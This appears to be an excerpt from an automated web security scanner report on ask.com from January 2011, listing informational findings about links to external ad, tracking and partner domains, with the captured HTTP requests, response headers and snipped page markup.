http://www.google.com/aclk?sa=l&ai=CED2C_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtyG220bvgLf4fP9e765DVnrg42pMg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture
http://www.google.com/aclk?sa=l&ai=CMCQk_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwktBGlh1rNebNd3NulaNE2TzZ8UA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool
http://www.google.com/aclk?sa=l&ai=C_sTH_spBTeudOoK8gwfIz-yTD5yQkeEBpIyLrBTc66IsEAIg75WbESgFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q-q92ihzp86vFODP4CEWd0x6VtE9LE8k&num=2&sig=AGiWqtxSQWBU4liSBvMNA4fQK66bDgwRjg&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404
http://www.google.com/aclk?sa=l&ai=CrkOo_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&sig=AGiWqtzc_ex2ZkY--3T-USLukZqd2vGROA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts
http://www.google.com/aclk?sa=l&ai=Crxih_spBTeudOoK8gwfIz-yTD6Gt3D3Rh5_cA-vXuQgQBCDvlZsRKAVQurXcwgdgyYajh9SjgBCgAde7gf8DyAEBqgQZT9CqmHqKGunzq8U4M_gIRZ3THpW0T0sTyQ&num=4&sig=AGiWqtzfapiQTpsWHnX7SVnqBGPBniOV1w&adurl=http://www.boatbandit.com
http://www.google.com/aclk?sa=l&ai=CsM_F_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtxMkABiv4xAAkNIyAsRXPcZUOawhg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing

Request

GET /videos?qsrc=167&o=0&l=dir&q=regulator+boat HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:43:58 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQzOjU4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:58 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:58 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 67792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>


...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

                    <a href="http://www.google.com/aclk?sa=L&ai=CcKc2_spBTeudOoK8gwfIz-yTD6n3pJ4B5ZrwpxLfgdAFEAEg75WbESgFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0MqZdYof6fPyxFk09BafLdd2ys0z&num=1&sig=AGiWqtwx-TY2qbdmjiZTlRxCQZ1i3gWWlw&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(5); if (typeof efclk != 'undefined') efclk(5); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_0');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">

...[SNIP]...

                    <a href="http://www.google.com/aclk?sa=l&ai=C_sTH_spBTeudOoK8gwfIz-yTD5yQkeEBpIyLrBTc66IsEAIg75WbESgFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q-q92ihzp86vFODP4CEWd0x6VtE9LE8k&num=2&sig=AGiWqtxSQWBU4liSBvMNA4fQK66bDgwRjg&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(90); if (typeof efclk != 'undefined') efclk(90); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">

...[SNIP]...
<div id="result">
<iframe id="resultPage" style="width:100%;height:1464px;margin:10px 0 0 0;" src="http://www.ask.blinkx.com/videos/regulator+boat?ver=14&host=US&referer=ask.com" frameborder="no" scrolling="no"></iframe>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CcKc2_spBTeudOoK8gwfIz-yTD6n3pJ4B5ZrwpxLfgdAFEAEg75WbESgFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0MqZdYof6fPyxFk09BafLdd2ys0z&num=1&sig=AGiWqtwx-TY2qbdmjiZTlRxCQZ1i3gWWlw&adurl=http://www.gatewaymarina.com/ship_store.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(3); if (typeof efclk != 'undefined') efclk(3); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_0');" class="nu" onmouseover="return ss('www.gatewaymarina.com')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C_sTH_spBTeudOoK8gwfIz-yTD5yQkeEBpIyLrBTc66IsEAIg75WbESgFUKuO7fEFYMmGo4fUo4AQoAGA6M38A8gBAaoEGU_Q-q92ihzp86vFODP4CEWd0x6VtE9LE8k&num=2&sig=AGiWqtxSQWBU4liSBvMNA4fQK66bDgwRjg&adurl=http://tracking.searchmarketing.com/click.asp%3FAID%3D757733697%26CAPCID%3D5362083404" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(5); if (typeof efclk != 'undefined') efclk(5); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_1');" class="nu" onmouseover="return ss('www.wholesalemarine.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CrkOo_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&sig=AGiWqtzc_ex2ZkY--3T-USLukZqd2vGROA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CrkOo_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUIfc5pcHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&sig=AGiWqtzc_ex2ZkY--3T-USLukZqd2vGROA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fsite_section%252Fboating_and_marine_section.shtml%253Fs_kwcid%253Dadwords_boating_parts" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('overtons.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CsM_F_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtxMkABiv4xAAkNIyAsRXPcZUOawhg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CsM_F_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUM_1s-kEYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtxMkABiv4xAAkNIyAsRXPcZUOawhg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CAgT6_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwEbxDvDbAVVP3IjQQQa68S0Xeuyw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CAgT6_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwEbxDvDbAVVP3IjQQQa68S0Xeuyw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CMCQk_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwktBGlh1rNebNd3NulaNE2TzZ8UA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CMCQk_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUNHtnYX5_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwktBGlh1rNebNd3NulaNE2TzZ8UA&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CED2C_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtyG220bvgLf4fP9e765DVnrg42pMg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(71); if (typeof efclk != 'undefined') efclk(71); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_2');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CED2C_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUJyA1YgHYMmGo4fUo4AQoAG50r__A8gBAaoEHE_Q-o18ih3p8-PFplxraUKRzcQlsCcUarWUEY4&num=3&ctype=4&sig=AGiWqtyG220bvgLf4fP9e765DVnrg42pMg&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=Crxih_spBTeudOoK8gwfIz-yTD6Gt3D3Rh5_cA-vXuQgQBCDvlZsRKAVQurXcwgdgyYajh9SjgBCgAde7gf8DyAEBqgQZT9CqmHqKGunzq8U4M_gIRZ3THpW0T0sTyQ&num=4&sig=AGiWqtzfapiQTpsWHnX7SVnqBGPBniOV1w&adurl=http://www.boatbandit.com" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(1); if (typeof efclk != 'undefined') efclk(1); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_3');" class="nu" onmouseover="return ss('www.<b>boat</b>bandit.com')" onmouseout="cs()" style="display:block;padding:0px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C1_n1_spBTeudOoK8gwfIz-yTD-2R_78Br7bGshWQqMEHEAUg75WbESgFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2thwihvp86vFOCL5x2pOscMprv2kbt3LaPKHv5I&num=5&sig=AGiWqtwtAcSl9XlDPKnVHACTiDHwOVsABw&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(99); if (typeof efclk != 'undefined') efclk(99); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D2af3k6-UCV615%26sgch%3Db233gCa1Ku'},'gg_4');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">

...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.21. http://www.ask.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/videos?o=0&l=dir

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.ask.blinkx.com/videowall?ver=14&host=US&referer=ask.com
http://www.askkids.com/?o=0&l=dir

Request

GET /videos?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:43:58 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQzOjU4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:58 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:58 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 38473

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="result">
<iframe id="resultPage" style="width:100%;height:515px;margin:10px 0 0 0;" src="http://www.ask.blinkx.com/videowall?ver=14&host=US&referer=ask.com" frameborder="no" scrolling="no"></iframe>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.22. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Is+it+going+to+rain%3F&qsrc=3195

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CMq12P2L26YCFYrc4AodNkpZ8Q/aj-cat.png
http://answers.yahoo.com/question/index?qid=20081004154711AAi5aHz
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Is+it+going+to+rain%3F
http://ask.weather.com/outlook/local/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-cc
http://ask.weather.com/weather/hourbyhour/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-hbh
http://ask.weather.com/weather/map/interactive/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=iRadar
http://ask.weather.com/weather/tenday/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-tenday
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=;u4=;u3=;u2=0;ord=-997501698?
http://goingtorain.com/
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://isitgoingtoraintoday.com/
http://www.associatedcontent.com/article/5524366/is_it_going_to_rain.html
http://www.google.com/aclk?sa=L&ai=CLfCb6sNBTcqYM4q5gwe2lOWKD6jnhcUBuLK46xjY9ecMEAIg-_6BAygFUOHBm-gHYMmGo4fUo4AQyAEBqQLk-rgrfNawPqoEHk_QrmEYtgrADHBEIXJpFnboYWrwq3EvKGjKLMwzVg&num=2&sig=AGiWqtwf3W1TlGdFXwoA1ehImPWh0iZvBQ&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809568%26247subproduct%3DSEARCH
http://www.google.com/aclk?sa=L&ai=Cv9Su6sNBTcqYM4q5gwe2lOWKD87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0M51drYNwAxwRGlytnuV36-Mp3hy4sduaBc&num=5&sig=AGiWqtywlF7JSyjS8g_uXcHn2SPP6DEN2g&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php
http://www.google.com/aclk?sa=L&ai=CxMgu6sNBTcqYM4q5gwe2lOWKD_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9D-EnO2DMAMcERpcrZqlBUgnt5ll3j7awfDypFtjRRj&num=4&sig=AGiWqtzur8rggIC2_JpqkZ4eCLwBfMZqog&adurl=http://www.nowaktours.com
